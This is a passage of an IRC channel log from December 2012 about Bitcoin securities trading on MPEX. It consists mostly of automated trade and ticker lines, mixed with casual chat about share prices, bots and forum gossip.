16 20:17:13 [MPEX] [S.MPOE] 1421 @ 0.00062628 = 0.8899 BTC [+] Dec 16 20:17:14 [MPEX] [S.MPOE] 1499 @ 0.00062633 = 0.9389 BTC [+] Dec 16 20:18:53 o back down under 13.5 huh Dec 16 20:28:43 mircea_popescu: do you like rothbard? http://www.amazon.com/What-Government-Money-Percent-Dollar/dp/0945466447/ref=sr_1_2?ie=UTF8&qid=1355158265&sr=8-2&keywords=what+has+government+done+to+our+money Dec 16 20:32:53 [MPEX] [S.MPOE] 4114 @ 0.00062019 = 2.5515 BTC [-] Dec 16 20:34:44 [MPEX] [S.MPOE] 207 @ 0.00062019 = 0.1284 BTC [-] Dec 16 20:34:45 [MPEX] [S.MPOE] 11841 @ 0.00062048 = 7.3471 BTC [+] Dec 16 20:34:47 [MPEX] [S.MPOE] 7352 @ 0.00062173 = 4.571 BTC [+] Dec 16 20:49:05 [MPEX] [S.MPOE] 4321 @ 0.00062128 = 2.6846 BTC [-] Dec 16 20:49:06 [MPEX] [S.MPOE] 1000 @ 0.00062114 = 0.6211 BTC [-] Dec 16 20:49:08 [MPEX] [S.MPOE] 10879 @ 0.00062113 = 6.7573 BTC [-] Dec 16 20:51:25 [MPEX] [S.MPOE] 321 @ 0.00062113 = 0.1994 BTC [-] Dec 16 20:51:26 [MPEX] [S.MPOE] 6310 @ 0.00061864 = 3.9036 BTC [-] Dec 16 20:51:27 [MPEX] [S.MPOE] 7726 @ 0.0006152 = 4.753 BTC [-] Dec 16 20:51:29 [MPEX] [S.MPOE] 458 @ 0.000611 = 0.2798 BTC [-] Dec 16 20:58:07 [MPEX] [S.MPOE] 4321 @ 0.00061116 = 2.6408 BTC [+] Dec 16 20:58:09 [MPEX] [S.MPOE] 542 @ 0.000611 = 0.3312 BTC [-] Dec 16 20:58:09 [MPEX] [S.MPOE] 11663 @ 0.00061099 = 7.126 BTC [-] Dec 16 20:58:10 [MPEX] [S.MPOE] 7124 @ 0.00060935 = 4.341 BTC [-] Dec 16 21:00:55 i dunno. Dec 16 21:04:49 [MPEX] [S.MPOE] 4321 @ 0.00060969 = 2.6345 BTC [+] Dec 16 21:04:51 [MPEX] [S.MPOE] 17411 @ 0.00060935 = 10.6094 BTC [-] Dec 16 21:04:52 [MPEX] [S.MPOE] 4068 @ 0.00060866 = 2.476 BTC [-] Dec 16 21:10:04 You don't like Murray Rothbard? Dec 16 21:10:06 awww Dec 16 21:10:15 where is vorhees when you need him Dec 16 21:16:29 [MPEX] [S.MPOE] 3741 @ 0.00062173 = 2.3259 BTC [+] Dec 16 21:16:31 [MPEX] [S.MPOE] 10459 @ 0.00062633 = 6.5508 BTC [+] Dec 16 21:22:12 i have no idea who he is. Dec 16 21:23:19 you'd love him Dec 16 21:23:25 and he'd love you if he was still alive Dec 16 21:23:29 hehe c ool. Dec 16 21:23:29 (no homo) Dec 16 21:23:56 ;;ticker Dec 16 21:23:57 BTCUSD ticker | Best bid: 13.40000, Best ask: 13.40001, Bid-ask spread: 0.00001, Last trade: 13.40000, 24 hour volume: 20990.42923800, 24 hour low: 13.20000, 24 hour high: 13.66548, 24 hour vwap: 13.44749 Dec 16 21:24:09 he talks about how the money supply has been poisoned by the state Dec 16 21:25:05 [MPEX] [O.BTCUSD.P150T] 580 @ 0.15006733 = 87.0391 BTC [-] Dec 16 21:25:47 [MPEX] [S.DICE] 72450 @ 0.00339995 = 246.3264 BTC [+] Dec 16 21:25:59 [MPEX] [S.MPOE] 4321 @ 0.00062616 = 2.7056 BTC [-] Dec 16 21:26:01 [MPEX] [S.MPOE] 142 @ 0.00062633 = 0.0889 BTC [+] Dec 16 21:26:02 [MPEX] [S.MPOE] 393 @ 0.00062652 = 0.2462 BTC [+] Dec 16 21:26:03 [MPEX] [S.MPOE] 457 @ 0.00062688 = 0.2865 BTC [+] Dec 16 21:26:04 [MPEX] [S.MPOE] 15987 @ 0.00062756 = 10.0328 BTC [+] Dec 16 21:26:41 heh. so it rebounded already ? Dec 16 21:26:48 !ticker s.dice Dec 16 21:26:51 [MPEX:S.DICE] 1day: 0.0018 / 0.00306352 / 0.0034 (212632 shares, 651.40 BTC), 30day: 0.0018 / 0.00337216 / 0.0034 (5019919 shares, 16,928.01 BTC) Dec 16 21:26:52 [MPEX] [S.MPOE] 4321 @ 0.00062439 = 2.698 BTC [-] Dec 16 21:26:54 [MPEX] [S.MPOE] 10929 @ 0.00062422 = 6.8221 BTC [-] Dec 16 21:26:56 [MPEX] [S.DICE] 448529 @ 0.0034 = 1524.9986 BTC [+] Dec 16 21:27:16 o.O Dec 16 21:27:17 !ticker s.dice Dec 16 21:27:19 [MPEX:S.DICE] 1day: 0.0018 / 0.00329178 / 0.0034 (661161 shares, 2,176.40 BTC), 30day: 0.0018 / 0.00337445 / 0.0034 (5468448 shares, 18,453.01 BTC) Dec 16 21:27:37 wowza. the wall is gone. Dec 16 21:28:00 [MPEX] [S.MPOE] 4321 @ 0.00062721 = 2.7102 BTC [+] Dec 16 21:28:02 [MPEX] [S.MPOE] 8513 @ 0.00062756 = 5.3424 BTC [+] Dec 16 21:28:03 [MPEX] [S.MPOE] 6839 @ 0.00062759 = 4.2921 BTC [+] Dec 16 21:28:36 Bugpowder lol do you watch the ticker and log into irc when stuff happens ? Dec 16 21:29:38 What's the spring scrub? Dec 16 21:29:53 is S.DICE ready to free fall? Dec 16 21:30:20 what happened this time? Dec 16 21:30:22 Yes generally Dec 16 21:30:26 but not this time Dec 16 21:30:31 [MPEX] [S.MPOE] 4321 @ 0.00062752 = 2.7115 BTC [-] Dec 16 21:30:33 [MPEX] [S.MPOE] 14079 @ 0.00062759 = 8.8358 BTC [+] Dec 16 21:30:35 Bugpowder the 34 wall is pretty much gone Dec 16 21:30:53 Namjies http://trilema.com/2012/mpex-accounts-spring-scrub-2013/ Dec 16 21:30:58 ofuck Dec 16 21:31:04 what a tard that sold at 18 Dec 16 21:31:10 ok time to raise my bid Dec 16 21:31:13 to .34 Dec 16 21:31:34 ya lol was funny earlier. Dec 16 21:31:41 someone got like 30-40k shares. Dec 16 21:32:55 Hmm, who made the windows branch for pympex? Dec 16 21:33:03 https://bitcointalk.org/index.php?topic=131093.0 lol transcribing is now hot. Dec 16 21:33:09 Namjies ageis ? Dec 16 21:35:56 hmm Dec 16 21:39:52 kakobrekla: did kakobrekla wrote the assbot? Dec 16 21:40:09 yeah it was kakobrekla. Dec 16 21:40:21 kakobrekla: thank kakobrekla :) Dec 16 21:40:32 will do. Dec 16 21:40:50 I did not notice I had your name on the line from k+"tab" Dec 16 21:41:19 [MPEX] [X.EWTI] 306 @ 0.062088 = 18.9989 BTC [+] Dec 16 21:41:23 do you have the code publicly available? Dec 16 21:41:47 nope Dec 16 21:41:52 :( Dec 16 21:42:05 [MPEX] [X.INDQ] 118 @ 0.1898046 = 22.3969 BTC [-] Dec 16 21:42:06 [MPEX] [X.INDQ] 132 @ 0.18822917 = 24.8463 BTC [-] Dec 16 21:42:31 greedy is writing a bot for LTC markets. I recommended assbot to him Dec 16 21:43:19 why invent the wheel if there is something as mature :) like assbot Dec 16 21:44:29 !ticker s.mpoe Dec 16 21:44:32 [MPEX:S.MPOE] 1day: 0.00060866 / 0.00062199 / 0.00063995 (2639341 shares, 1,641.66 BTC), 30day: 0.00048504 / 0.00052868 / 0.00063995 (100948276 shares, 53,369.34 BTC) Dec 16 21:44:32 ;;ticker Dec 16 21:44:33 BTCUSD ticker | Best bid: 13.20002, Best ask: 13.34900, Bid-ask spread: 0.14898, Last trade: 13.19897, 24 hour volume: 21718.03350525, 24 hour low: 13.19890, 24 hour high: 13.66548, 24 hour vwap: 13.44090 Dec 16 21:44:43 ;;calc 13.44090* 0.00062199 Dec 16 21:44:44 0.008360105391 Dec 16 21:45:05 heh. Dec 16 21:45:10 and on that note, gnight all. **** BEGIN LOGGING AT Mon Dec 17 05:11:21 2012 Dec 17 05:12:38 ;;ticker Dec 17 05:12:39 BTCUSD ticker | Best bid: 13.31127, Best ask: 13.43100, Bid-ask spread: 0.11973, Last trade: 13.30405, 24 hour volume: 44367.91893869, 24 hour low: 13.13111, 24 hour high: 13.62000, 24 hour vwap: 13.34416 Dec 17 05:12:55 ;;bc,24hprc Dec 17 05:12:56 13.35 Dec 17 05:13:19 [MPEX] [S.MPOE] 7845 @ 0.00063266 = 4.9632 BTC [+] Dec 17 05:17:21 !ticker s.dice Dec 17 05:17:22 [MPEX:S.DICE] 1day: 0.0018 / 0.0032933 / 0.0034 (689013 shares, 2,269.13 BTC), 30day: 0.0018 / 0.0033742 / 0.0034 (5507863 shares, 18,584.64 BTC) Dec 17 05:23:20 only 45k at .0034 Dec 17 05:26:31 [MPEX] [S.MPOE] 9800 @ 0.00063147 = 6.1884 BTC [-] Dec 17 05:28:52 and i just processed a ream of deposits Dec 17 05:33:38 [MPEX] [S.MPOE] 5106 @ 0.00063266 = 3.2304 BTC [+] Dec 17 05:33:39 [MPEX] [S.MPOE] 22614 @ 0.00063266 = 14.307 BTC [+] Dec 17 05:35:46 [MPEX] [S.DICE] 1000 @ 0.00325109 = 3.2511 BTC [+] Dec 17 05:37:28 [MPEX] [S.DICE] 100 @ 0.00325109 = 0.3251 BTC [+] Dec 17 05:38:11 [MPEX] [S.DICE] 200 @ 0.00325109 = 0.6502 BTC [+] Dec 17 05:49:47 Why can't anyone break this code? they claim it might have involved a "one time pad" Dec 17 05:49:47 uh... can't we super-compute the code on out of there real quick? Dec 17 05:49:53 lmao micon is such a tard. Dec 17 05:53:47 ??? Dec 17 05:54:53 [MPEX] [S.DICE] 850 @ 0.00325109 = 2.7634 BTC [+] Dec 17 05:54:54 [MPEX] [S.DICE] 150 @ 0.00325704 = 0.4886 BTC [+] Dec 17 05:56:13 [MPEX] [S.MPOE] 4321 @ 0.00063155 = 2.7289 BTC [-] Dec 17 05:56:14 [MPEX] [S.MPOE] 5900 @ 0.00063147 = 3.7257 BTC [-] Dec 17 05:59:32 coingenuity https://bitcointalk.org/index.php?topic=54957.msg1404011#msg1404011 Dec 17 06:00:15 https://bitcointalk.org/index.php?topic=131156.0 Dec 17 06:00:36 he must have some broke ass friends if anyone is going to jump at $1 Dec 17 06:01:00 moreover, i'd be surprised if 1 in 10`000 facebook accounts actually has a human being behind them Dec 17 06:01:25 what he did is basically akin to generating a number of random email addresses, sending them mail, waiting for answers. Dec 17 06:01:35 mircea_popescu: i've already had my staff contact him, one of them got a tongue-lashing for not following my instructions to do it a long time ago Dec 17 06:01:50 well, all of my fb friends are real Dec 17 06:01:58 on my real fb account that is ;) Dec 17 06:02:08 thanks for the heads up, though Dec 17 06:02:40 a ok Dec 17 06:03:01 dub lol. POINT IN CASE Dec 17 06:03:18 mircea_popescu: i actually just gave the staff member in question a tongue lashing about this Dec 17 06:03:23 he's in trouble now >.> Dec 17 06:03:38 mircea_popescu likes to tounge lash his employees too Dec 17 06:03:40 [MPEX] [S.MPOE] 11450 @ 0.00062885 = 7.2003 BTC [-] Dec 17 06:04:28 [MPEX] [S.MPOE] 15600 @ 0.00062885 = 9.8101 BTC [-] Dec 17 06:04:51 coingenuity the risk is always that there's going to be some unhappy customer wedged into some obscure corner Dec 17 06:04:59 so if i see something i say something sorta thing Dec 17 06:05:25 i know it costs me plenty of money to try and keep on top of things and i'm only moderately successful at it. Dec 17 06:05:39 mircea_popescu: actually, he's high on my priority list- the manufacturer of the product he ordered has been doing a total restructuring of their supply chain so i'm having to work with their delay Dec 17 06:05:58 the issue is that i told my staff to tell him what was going on, but they failed to do so and now he's worried Dec 17 06:06:17 either way, the person in charge of talking to him has been yelled at, that customer will be sorted shortly Dec 17 06:07:15 (it should also be noted that he's the only cust still waiting on that product, we luckily had hundreds of oz on hand when the manufacturer took a dump so caught the delay preemptorily) Dec 17 06:07:39 needless to say, i am far from amused with that particular manufacturer at the moment >.> Dec 17 06:08:12 [MPEX] [S.MPOE] 4300 @ 0.00062896 = 2.7045 BTC [+] Dec 17 06:08:40 and, i appreciate you bringing it to my attention, as always- i keep tabs personally on every single order so if someone starts to feel neglected, i like to hear about it Dec 17 06:15:47 [MPEX] [S.DICE] 3019 @ 0.00325704 = 9.833 BTC [+] Dec 17 06:15:48 [MPEX] [S.DICE] 3900 @ 0.00331655 = 12.9345 BTC [+] Dec 17 06:15:50 [MPEX] [S.DICE] 4450 @ 0.00332543 = 14.7982 BTC [+] Dec 17 06:15:51 [MPEX] [S.DICE] 3778 @ 0.00333037 = 12.5821 BTC [+] Dec 17 06:15:52 [MPEX] [S.DICE] 30180 @ 0.0034 = 102.612 BTC [+] Dec 17 06:20:43 coingenuity sure :) Dec 17 06:21:01 smickles ^^ Dec 17 06:21:07 aaaand... its gone Dec 17 06:22:42 [MPEX] [S.DICE] 15147 @ 0.0034 = 51.4998 BTC [+] Dec 17 06:22:43 [MPEX] [S.DICE] 2200 @ 0.00340395 = 7.4887 BTC [+] Dec 17 06:22:45 [MPEX] [S.DICE] 153 @ 0.00341965 = 0.5232 BTC [+] Dec 17 06:23:22 omfg liftoff! Dec 17 06:24:03 [MPEX] [S.MPOE] 108 @ 0.00062885 = 0.0679 BTC [-] Dec 17 06:24:05 [MPEX] [S.MPOE] 20392 @ 0.00062766 = 12.7992 BTC [-] Dec 17 06:24:23 [MPEX] [S.DICE] 1097 @ 0.00341965 = 3.7514 BTC [+] Dec 17 06:24:24 [MPEX] [S.DICE] 1600 @ 0.00344363 = 5.5098 BTC [+] Dec 17 06:24:25 [MPEX] [S.DICE] 1900 @ 0.0034661 = 6.5856 BTC [+] Dec 17 06:24:26 [MPEX] [S.DICE] 5722 @ 0.00346716 = 19.8391 BTC [+] Dec 17 06:24:27 [MPEX] [S.DICE] 1154 @ 0.00347241 = 4.0072 BTC [+] Dec 17 06:24:29 [MPEX] [S.DICE] 2203 @ 0.00349493 = 7.6993 BTC [+] Dec 17 06:24:30 [MPEX] [S.DICE] 3150 @ 0.0035011 = 11.0285 BTC [+] Dec 17 06:24:31 [MPEX] [S.DICE] 27174 @ 0.003695 = 100.4079 BTC [+] Dec 17 06:24:57 !ticker s.dice Dec 17 06:24:59 [MPEX:S.DICE] 1day: 0.0018 / 0.00331734 / 0.003695 (798140 shares, 2,647.71 BTC), 30day: 0.0018 / 0.00337604 / 0.003695 (5616990 shares, 18,963.22 BTC) Dec 17 06:25:18 oh my Dec 17 06:25:31 [MPEX] [S.MPOE] 6800 @ 0.00062896 = 4.2769 BTC [+] Dec 17 06:25:38 lol i guess everyone can now book the 3 / 34 gain Dec 17 06:26:45 does that say 1day low of .0018? Dec 17 06:26:58 yah someone sold it yest Dec 17 06:26:59 wow Dec 17 06:27:09 someone ended up with a 40k ish block gifted at 18 Dec 17 06:27:51 why couldn't that have been my buy at .00032 D: Dec 17 06:27:56 lol Dec 17 06:28:09 odd, bugpowder was saying the same thing Dec 17 06:28:21 oh wait Dec 17 06:28:28 mine is the .00003 Dec 17 06:28:50 "I have a webhosting that is of alright speeds in terms of loading pages and stuff, " lol Dec 17 06:28:58 at one point in time, that was the best bid Dec 17 06:29:07 did it ever get any fill ? Dec 17 06:29:11 none Dec 17 06:29:29 well was worth a shot Dec 17 06:29:53 yeah, it was at the height of that mr.big criticism too Dec 17 06:29:55 next stop 1btc Dec 17 06:29:59 i was sure i'd get some Dec 17 06:30:00 plox Dec 17 06:30:07 10mil btc patriots win Dec 17 06:30:10 lolll Dec 17 06:30:52 mircea_popescu: care to say what the current volatility is according to mpoebot? Dec 17 06:32:36 lol nope Dec 17 06:32:57 "My wife and I don't have many services to sell here, except for this. She started out as a small B cup, then had a BA surgery (350cc) to bring her to a D, then another about 18 months ago (600cc), to bring her to a DDD. Since then she has really started to take care of her body and has worked out a bunch." Dec 17 06:33:03 heh. people of ddditcoin Dec 17 06:33:53 is this the asian breast implant thread? Dec 17 06:34:22 i think it must be Dec 17 06:34:26 [MPEX] [S.MPOE] 1511 @ 0.00062896 = 0.9504 BTC [+] Dec 17 06:41:12 phys delivery is set for january 2013 Dec 17 06:46:09 eee ? Dec 17 06:46:23 what's eee? Dec 17 06:47:06 [MPEX] [S.MPOE] 3318 @ 0.00062896 = 2.0869 BTC [+] Dec 17 06:47:08 [MPEX] [S.MPOE] 6086 @ 0.00063266 = 3.8504 BTC [+] Dec 17 06:47:09 [MPEX] [S.MPOE] 1996 @ 0.00063283 = 1.2631 BTC [+] Dec 17 06:51:11 [MPEX] [S.MPOE] 4321 @ 0.00062797 = 2.7135 BTC [-] Dec 17 06:51:13 [MPEX] [S.MPOE] 1171 @ 0.00062773 = 0.7351 BTC [-] Dec 17 06:51:14 [MPEX] [S.MPOE] 4758 @ 0.00062766 = 2.9864 BTC [-] Dec 17 06:51:15 [MPEX] [S.MPOE] 10269 @ 0.00062746 = 6.4434 BTC [-] Dec 17 06:56:40 [MPEX] [S.MPOE] 4321 @ 0.00063256 = 2.7333 BTC [+] Dec 17 06:56:41 [MPEX] [S.MPOE] 5348 @ 0.00063283 = 3.3844 BTC [+] Dec 17 06:56:41 [MPEX] [S.MPOE] 3131 @ 0.00063312 = 1.9823 BTC [+] Dec 17 07:02:53 [MPEX] [S.MPOE] 4321 @ 0.00062748 = 2.7113 BTC [-] Dec 17 07:02:54 [MPEX] [S.MPOE] 2331 @ 0.00062746 = 1.4626 BTC [-] Dec 17 07:02:55 [MPEX] [S.MPOE] 9850 @ 0.0006273 = 6.1789 BTC [-] Dec 17 07:13:11 [MPEX] [S.MPOE] 4500 @ 0.00062928 = 2.8318 BTC [+] Dec 17 07:13:11 [MPEX] [S.MPOE] 4321 @ 0.00063283 = 2.7345 BTC [+] Dec 17 07:13:13 [MPEX] [S.MPOE] 4867 @ 0.00063312 = 3.0814 BTC [+] Dec 17 07:20:32 excitement Dec 17 07:21:45 As many of you know, I'm reaching 18 years old this year, and even though the Bitcoinica venture was extremely exciting and eye-opening for a teenager, I have to admit that I could have displayed a higher level of maturity and professionalism in some matters. Dec 17 07:21:45 Also, I also have to admit that a lot of the business circumstances were well beyond my scope of understanding. I assure you that I have learned the relevant lessons and I will do a much better job in my next project — NameTerrific. Dec 17 07:21:48 ahh this is so great. Dec 17 07:23:32 [MPEX] [S.MPOE] 4321 @ 0.0006316 = 2.7291 BTC [-] Dec 17 07:23:32 [MPEX] [S.MPOE] 10629 @ 0.00063144 = 6.7116 BTC [-] Dec 17 07:33:13 [MPEX] [S.MPOE] 4321 @ 0.00063268 = 2.7338 BTC [+] Dec 17 07:33:14 [MPEX] [S.MPOE] 22150 @ 0.00063302 = 14.0214 BTC [+] Dec 17 07:33:16 [MPEX] [S.MPOE] 9252 @ 0.00063312 = 5.8576 BTC [+] Dec 17 07:38:57 [MPEX] [S.MPOE] 4321 @ 0.00063145 = 2.7285 BTC [-] Dec 17 07:38:59 [MPEX] [S.MPOE] 10393 @ 0.00063144 = 6.5626 BTC [-] Dec 17 07:44:23 [MPEX] [S.MPOE] 816 @ 0.00062969 = 0.5138 BTC [-] Dec 17 07:50:35 [MPEX] [S.MPOE] 1346 @ 0.00063088 = 0.8492 BTC [+] Dec 17 07:50:37 [MPEX] [S.MPOE] 3415 @ 0.0006273 = 2.1422 BTC [-] Dec 17 07:50:38 [MPEX] [S.MPOE] 15600 @ 0.00062653 = 9.7739 BTC [-] Dec 17 07:50:38 [MPEX] [S.MPOE] 2331 @ 0.00062541 = 1.4578 BTC [-] Dec 17 07:54:56 !ticker s.mpoe Dec 17 07:54:58 [MPEX:S.MPOE] 1day: 0.00060866 / 0.00062191 / 0.00063703 (2516188 shares, 1,564.85 BTC), 30day: 0.00048504 / 0.00053022 / 0.00063995 (99764148 shares, 52,897.21 BTC) Dec 17 07:55:01 !ticker s.dice Dec 17 07:55:03 [MPEX:S.DICE] 1day: 0.0018 / 0.0033162 / 0.003695 (787254 shares, 2,610.69 BTC), 30day: 0.0018 / 0.00337604 / 0.003695 (5616990 shares, 18,963.22 BTC) Dec 17 07:55:04 !ticker s.bvps Dec 17 07:55:06 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0022 / 0.00319418 / 0.0067 (181977 shares, 581.27 BTC) Dec 17 07:58:22 [MPEX] [S.BVPS] 5 @ 0.0067 = 0.0335 BTC [+] Dec 17 07:58:25 !ticker s.bvps Dec 17 07:58:27 [MPEX:S.BVPS] 1day: 0.0067 / 0.0067 / 0.0067 (5 shares, 0.03 BTC), 30day: 0.0022 / 0.00319428 / 0.0067 (181982 shares, 581.30 BTC) Dec 17 08:00:25 [MPEX] [S.MPOE] 5590 @ 0.00062586 = 3.4986 BTC [+] Dec 17 08:08:42 [MPEX] [S.MPOE] 5060 @ 0.00062586 = 3.1669 BTC [+] Dec 17 08:08:43 [MPEX] [S.MPOE] 6200 @ 0.00063147 = 3.9151 BTC [+] Dec 17 08:08:44 [MPEX] [S.MPOE] 4321 @ 0.00063292 = 2.7348 BTC [+] Dec 17 08:08:46 [MPEX] [S.MPOE] 4819 @ 0.00063312 = 3.051 BTC [+] Dec 17 08:10:07 [MPEX] [S.MPOE] 4321 @ 0.00062571 = 2.7037 BTC [-] Dec 17 08:10:07 [MPEX] [S.MPOE] 4519 @ 0.00062541 = 2.8262 BTC [-] Dec 17 08:10:08 [MPEX] [S.MPOE] 9400 @ 0.00062516 = 5.8765 BTC [-] Dec 17 08:10:10 [MPEX] [S.MPOE] 1860 @ 0.00062422 = 1.161 BTC [-] Dec 17 08:16:51 [MPEX] [S.MPOE] 640 @ 0.00062422 = 0.3995 BTC [-] Dec 17 08:16:52 [MPEX] [S.MPOE] 15554 @ 0.00062332 = 9.6951 BTC [-] Dec 17 08:16:54 [MPEX] [S.MPOE] 6556 @ 0.00062324 = 4.086 BTC [-] Dec 17 08:28:55 [MPEX] [S.MPOE] 15144 @ 0.00062324 = 9.4383 BTC [-] Dec 17 08:28:57 [MPEX] [S.MPOE] 1206 @ 0.00062308 = 0.7514 BTC [-] Dec 17 08:29:33 [MPEX] [S.MPOE] 11644 @ 0.00062308 = 7.2551 BTC [-] Dec 17 08:29:34 [MPEX] [S.MPOE] 8400 @ 0.00062237 = 5.2279 BTC [-] Dec 17 08:30:38 WTS: O.BTCUSD.P10000T @ 8.61 BTC Dec 17 08:30:55 :/ Dec 17 08:32:52 ;;ticker Dec 17 08:32:53 BTCUSD ticker | Best bid: 13.14892, Best ask: 13.14893, Bid-ask spread: 0.00001, Last trade: 13.14892, 24 hour volume: 56690.90771471, 24 hour low: 13.01000, 24 hour high: 13.62000, 24 hour vwap: 13.30401 Dec 17 08:36:50 ;;calc 887 / 13.1 Dec 17 08:36:51 67.7099236641 Dec 17 08:36:54 [MPEX] [S.DICE] 4250 @ 0.00355493 = 15.1085 BTC [-] Dec 17 08:36:59 should be moar like 67 btc smickles Dec 17 08:37:41 otherwise i just buy em and execute on the spot. Dec 17 08:45:46 [MPEX] [S.MPOE] 1427 @ 0.00062175 = 0.8872 BTC [-] Dec 17 08:50:01 [MPEX] [S.MPOE] 6200 @ 0.00063242 = 3.921 BTC [+] Dec 17 08:54:09 [MPEX] [S.MPOE] 4321 @ 0.00063281 = 2.7344 BTC [+] Dec 17 08:54:11 [MPEX] [S.MPOE] 3315 @ 0.00063312 = 2.0988 BTC [+] Dec 17 09:00:42 [MPEX] [S.MPOE] 4321 @ 0.00063246 = 2.7329 BTC [-] Dec 17 09:00:44 [MPEX] [S.MPOE] 13523 @ 0.00063242 = 8.5522 BTC [-] Dec 17 09:00:45 [MPEX] [S.MPOE] 3006 @ 0.00062361 = 1.8746 BTC [-] Dec 17 09:02:55 [MPEX] [S.MPOE] 4321 @ 0.00063295 = 2.735 BTC [+] Dec 17 09:02:56 [MPEX] [S.MPOE] 2929 @ 0.00063312 = 1.8544 BTC [+] Dec 17 09:03:59 [MPEX] [S.MPOE] 4321 @ 0.00063305 = 2.7354 BTC [-] Dec 17 09:04:00 [MPEX] [S.MPOE] 8637 @ 0.00063312 = 5.4683 BTC [+] Dec 17 09:04:02 [MPEX] [S.MPOE] 7642 @ 0.00063354 = 4.8415 BTC [+] Dec 17 09:11:57 [MPEX] [S.MPOE] 4321 @ 0.0006238 = 2.6954 BTC [-] Dec 17 09:11:59 [MPEX] [S.MPOE] 7279 @ 0.00062361 = 4.5393 BTC [-] Dec 17 09:13:45 [MPEX] [S.MPOE] 7750 @ 0.00063294 = 4.9053 BTC [+] Dec 17 09:13:47 [MPEX] [S.MPOE] 3521 @ 0.0006333 = 2.2298 BTC [+] Dec 17 09:14:58 [MPEX] [S.MPOE] 800 @ 0.0006333 = 0.5066 BTC [+] Dec 17 09:14:59 [MPEX] [S.MPOE] 12458 @ 0.00063354 = 7.8926 BTC [+] Dec 17 09:15:01 [MPEX] [S.MPOE] 6384 @ 0.00063407 = 4.0479 BTC [+] Dec 17 09:15:02 [MPEX] [S.MPOE] 1190 @ 0.0006343 = 0.7548 BTC [+] Dec 17 09:20:35 [MPEX] [S.MPOE] 4321 @ 0.00063422 = 2.7405 BTC [-] Dec 17 09:20:36 [MPEX] [S.MPOE] 5341 @ 0.0006343 = 3.3878 BTC [+] Dec 17 09:22:14 [MPEX] [S.MPOE] 4321 @ 0.00062392 = 2.696 BTC [-] Dec 17 09:22:15 [MPEX] [S.MPOE] 10179 @ 0.00062361 = 6.3477 BTC [-] Dec 17 09:26:02 [MPEX] [S.MPOE] 4321 @ 0.00063162 = 2.7292 BTC [+] Dec 17 09:26:04 [MPEX] [S.MPOE] 17579 @ 0.00063169 = 11.1045 BTC [+] Dec 17 09:34:51 [MPEX] [S.MPOE] 760 @ 0.00063169 = 0.4801 BTC [+] Dec 17 09:34:53 [MPEX] [S.MPOE] 4134 @ 0.0006343 = 2.6222 BTC [+] Dec 17 09:34:54 [MPEX] [S.MPOE] 12050 @ 0.00063463 = 7.6473 BTC [+] Dec 17 09:34:55 [MPEX] [S.MPOE] 5173 @ 0.00063515 = 3.2856 BTC [+] Dec 17 09:39:36 [MPEX] [S.MPOE] 4321 @ 0.00062602 = 2.705 BTC [-] Dec 17 09:39:37 [MPEX] [S.MPOE] 629 @ 0.00062593 = 0.3937 BTC [-] Dec 17 09:43:55 [MPEX] [S.MPOE] 4321 @ 0.00062627 = 2.7061 BTC [+] Dec 17 09:43:57 [MPEX] [S.MPOE] 21979 @ 0.00062593 = 13.7573 BTC [-] Dec 17 09:49:58 [MPEX] [S.MPOE] 4321 @ 0.0006262 = 2.7058 BTC [+] Dec 17 09:49:58 [MPEX] [S.MPOE] 4542 @ 0.00062593 = 2.843 BTC [-] Dec 17 09:50:00 [MPEX] [S.MPOE] 5493 @ 0.00062361 = 3.4255 BTC [-] Dec 17 09:50:01 [MPEX] [S.MPOE] 7544 @ 0.00062215 = 4.6935 BTC [-] Dec 17 09:57:39 [MPEX] [S.MPOE] 4321 @ 0.00063503 = 2.744 BTC [+] Dec 17 09:57:40 [MPEX] [S.MPOE] 18229 @ 0.00063515 = 11.5781 BTC [+] Dec 17 10:11:00 [MPEX] [S.MPOE] 4321 @ 0.00062248 = 2.6897 BTC [-] Dec 17 10:11:01 [MPEX] [S.MPOE] 3056 @ 0.00062215 = 1.9013 BTC [-] Dec 17 10:11:02 [MPEX] [S.MPOE] 8203 @ 0.0006221 = 5.1031 BTC [-] Dec 17 10:14:53 [MPEX] [S.MPOE] 4321 @ 0.00063483 = 2.7431 BTC [+] Dec 17 10:14:54 [MPEX] [S.MPOE] 2403 @ 0.00063515 = 1.5263 BTC [+] Dec 17 10:14:56 [MPEX] [S.MPOE] 6285 @ 0.0006352 = 3.9922 BTC [+] Dec 17 10:16:01 [MPEX] [S.MPOE] 4321 @ 0.00063494 = 2.7436 BTC [-] Dec 17 10:16:02 [MPEX] [S.MPOE] 16545 @ 0.0006352 = 10.5094 BTC [+] Dec 17 10:16:04 [MPEX] [S.MPOE] 1708 @ 0.00063544 = 1.0853 BTC [+] Dec 17 10:22:58 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.12854229 = 128.5423 BTC [-] Dec 17 10:22:59 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.09560885 = 95.6089 BTC [-] Dec 17 10:23:29 [MPEX] [O.BTCUSD.P150T] 300 @ 0.15390384 = 46.1712 BTC [+] Dec 17 10:28:00 [MPEX] [S.MPOE] 4321 @ 0.00063543 = 2.7457 BTC [-] Dec 17 10:28:01 [MPEX] [S.MPOE] 20192 @ 0.00063544 = 12.8308 BTC [+] Dec 17 10:28:03 [MPEX] [S.MPOE] 1648 @ 0.00063573 = 1.0477 BTC [+] Dec 17 10:31:08 [MPEX] [S.MPOE] 2350 @ 0.00063573 = 1.494 BTC [+] Dec 17 10:47:54 [MPEX] [S.MPOE] 702 @ 0.00063573 = 0.4463 BTC [+] Dec 17 10:47:55 [MPEX] [S.MPOE] 14900 @ 0.00063588 = 9.4746 BTC [+] Dec 17 10:47:56 [MPEX] [S.MPOE] 5048 @ 0.000636 = 3.2105 BTC [+] Dec 17 11:13:44 [MPEX] [S.MPOE] 4321 @ 0.00062799 = 2.7135 BTC [-] Dec 17 11:13:45 [MPEX] [S.MPOE] 5279 @ 0.00062768 = 3.3135 BTC [-] Dec 17 11:21:20 mircea_popescu, what is the minimal amount now to buy mpoe bond? 100BTC? Dec 17 11:23:10 0,o Dec 17 11:23:15 hey jurov Dec 17 11:23:47 o/ Dec 17 11:26:01 [MPEX] [S.MPOE] 4321 @ 0.00063592 = 2.7478 BTC [+] Dec 17 11:26:03 [MPEX] [S.MPOE] 2079 @ 0.000636 = 1.3222 BTC [+] Dec 17 11:36:58 [MPEX] [S.DICE] 1568 @ 0.00337553 = 5.2928 BTC [-] Dec 17 11:42:26 [MPEX] [S.MPOE] 18350 @ 0.0006289 = 11.5403 BTC [-] Dec 17 11:52:00 [MPEX] [S.MPOE] 4321 @ 0.00062777 